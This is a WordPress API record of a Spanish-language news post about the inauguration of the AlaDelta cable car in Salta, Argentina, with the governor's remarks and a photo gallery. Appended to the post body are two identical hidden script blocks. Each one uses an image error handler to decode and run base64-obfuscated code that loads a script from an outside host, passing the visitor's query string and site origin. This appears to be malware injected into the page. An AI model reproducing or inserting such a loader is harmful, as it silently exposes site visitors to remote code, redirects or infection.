{"id":4710,"date":"2024-12-19T10:58:52","date_gmt":"2024-12-19T13:58:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4710"},"modified":"2025-08-13T23:43:09","modified_gmt":"2025-08-14T02:43:09","slug":"el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4710","title":{"rendered":"\u201cEl Telef\u00e9rico AlaDelta posiciona a Salta como destino de referencia a nivel nacional e internacional\u201d, dijo S\u00e1enz"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\"><strong><em>Salte\u00f1os y visitantes pueden disfrutar de una nueva experiencia con una perspectiva y paisajes \u00fanicos de nuestra tierra. El Gobernador asegur\u00f3 que \u201ceste Telef\u00e9rico ser\u00e1 orgullo de Salta y de los salte\u00f1os\u201d.<\/em><\/strong><\/h4>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Telef\u00e9rico AlaDelta posiciona a Salta como destino de referencia a nivel nacional e internacional\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/kx2L7y61O1k?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Uniendo las cimas de los cerros San Bernardo y AlaDelta y para transformar la experiencia tur\u00edstica en Salta, comenz\u00f3 a funcionar el Telef\u00e9rico AlaDelta. El gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>, encabez\u00f3 la inauguraci\u00f3n y asegur\u00f3 que esta inversi\u00f3n estrat\u00e9gica para los salte\u00f1os y el turismo, sigue posicionando a la provincia como destino de referencia a nivel nacional e internacional.<\/p>\n\n\n\n<p>\u201cHoy estamos cumpliendo un sue\u00f1o con esta obra que nos trasciende\u201d, indic\u00f3 S\u00e1enz y se\u00f1al\u00f3 que la \u201cresponsabilidad de la funci\u00f3n p\u00fablica\u201d es planificar y gestionar eficientemente \u201cpara cumplir con la palabra dada\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15387-inauguracion-20241218211229.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15387-inauguracion-20241218211229.webp\" alt=\"Inauguraci\u00f3n\" style=\"width:298px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Consider\u00f3 que durante estos cinco a\u00f1os de gesti\u00f3n y a partir de las distintas \u00e1reas del Gobierno de la provincia, \u201cSalta se est\u00e1 convirtiendo en el coraz\u00f3n del norte argentino\u201d.<\/p>\n\n\n\n<p>\u201cHoy estamos inaugurando este Telef\u00e9rico, orgullo de Salta y de los salte\u00f1os\u201d, manifest\u00f3, al destacar que nuestra provincia \u201cadem\u00e1s de sus paisajes, historia, tradiciones y costumbres tiene gente que con su amabilidad y calidez, nos hace \u00fanicos\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n el presidente del directorio de la Sociedad del Estado Complejo Telef\u00e9rico Salta,&nbsp;<strong>\u00c1ngel Causarano<\/strong>&nbsp;agradeci\u00f3 la decisi\u00f3n pol\u00edtica del gobernador S\u00e1enz para concretar el proyecto con \u201cuna empresa y obreros salte\u00f1os\u201d.<\/p>\n\n\n\n<p>Tras la ceremonia, el Gobernador, autoridades y la familia Mart\u00ednez, realizaron el viaje inaugural del Telef\u00e9rico Aladelta, que por 1001 metros y a partir de un sistema \u00fanico de una sola torre en el cerro Las Pavas, une las cimas de los cerros San Bernardo y AlaDelta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15388-inauguracion-20241218212323.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15388-inauguracion-20241218212323.webp\" alt=\"Inauguraci\u00f3n\" style=\"width:316px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>El nuevo telef\u00e9rico ofrece una capacidad de 15 personas por g\u00f3ndola y un servicio que permitir\u00e1 transportar hasta 200 personas por hora en cada sentido, brindando una experiencia \u00fanica con vistas panor\u00e1micas de Salta y sus alrededores.<\/p>\n\n\n\n<p>Ofrece a los visitantes miradores naturales con vistas panor\u00e1micas impresionantes; \u00e1rea de picnic para disfrutar al aire libre en un entorno natural privilegiado; drugstore y cafeter\u00eda; gimnasio gratuito al aire libre y sanitarios.<\/p>\n\n\n\n<p>Acompa\u00f1aron al Gobernador, el vicegobernador,&nbsp;<strong>Antonio Marocco<\/strong>; el intendente de Salta,&nbsp;<strong>Emiliano Durand<\/strong>; los ministros de Turismo y Deportes&nbsp;<strong>Manuela Arancibia<\/strong>&nbsp;y el de Infraestructura a cargo de la coordinaci\u00f3n de Enlace y Relaciones Pol\u00edticas; el presidente del Concejo Deliberante de Salta,&nbsp;<strong>Dar\u00edo Madile<\/strong>; autoridades provinciales y municipales, legisladores, personal del Telef\u00e9rico, entre otros.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Galer\u00eda de Fotos<\/h2>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4712\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9847-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp\" alt=\"\" class=\"wp-image-4712\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9847-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9847-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9847-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9847-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9847-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9847-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4713\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9848-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp\" alt=\"\" class=\"wp-image-4713\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9848-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9848-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9848-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9848-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9848-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9848-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4714\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9851-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp\" alt=\"\" class=\"wp-image-4714\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9851-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9851-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9851-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9851-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9851-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9851-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4711\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9852-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp\" alt=\"\" class=\"wp-image-4711\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9852-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9852-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9852-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9852-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9852-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9852-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4716\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9857-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp\" alt=\"\" class=\"wp-image-4716\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9857-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9857-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9857-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9857-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9857-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9857-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4715\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9860-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-gobernacion-noticias-de-salta-gobierno-18122024-1756-1024x576.webp\" alt=\"\" class=\"wp-image-4715\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9860-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-gobernacion-noticias-de-salta-gobierno-18122024-1756-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9860-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-gobernacion-noticias-de-salta-gobierno-18122024-1756-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9860-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-gobernacion-noticias-de-salta-gobierno-18122024-1756-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9860-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-gobernacion-noticias-de-salta-gobierno-18122024-1756-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9860-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-gobernacion-noticias-de-salta-gobierno-18122024-1756-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9860-el-teleferico-aladelta-posiciona-a-salta-como-destino-de-referencia-a-nivel-nacional-e-internacional-dijo-saenz-gobernacion-noticias-de-salta-gobierno-18122024-1756.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salte\u00f1os y visitantes pueden disfrutar de una nueva experiencia con una perspectiva y paisajes \u00fanicos de nuestra tierra. El Gobernador asegur\u00f3 que \u201ceste Telef\u00e9rico ser\u00e1 orgullo de Salta y de los salte\u00f1os\u201d. Uniendo las cimas de los cerros San Bernardo y AlaDelta y para transformar la experiencia tur\u00edstica en Salta, comenz\u00f3 a funcionar el Telef\u00e9rico [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4711,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[43,18],"tags":[],"class_list":{"0":"post-4710","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ambiente-naturaleza","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4710"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4710"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4710\/revisions"}],"predecessor-version":[{"id":6605,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4710\/revisions\/6605"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4711"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}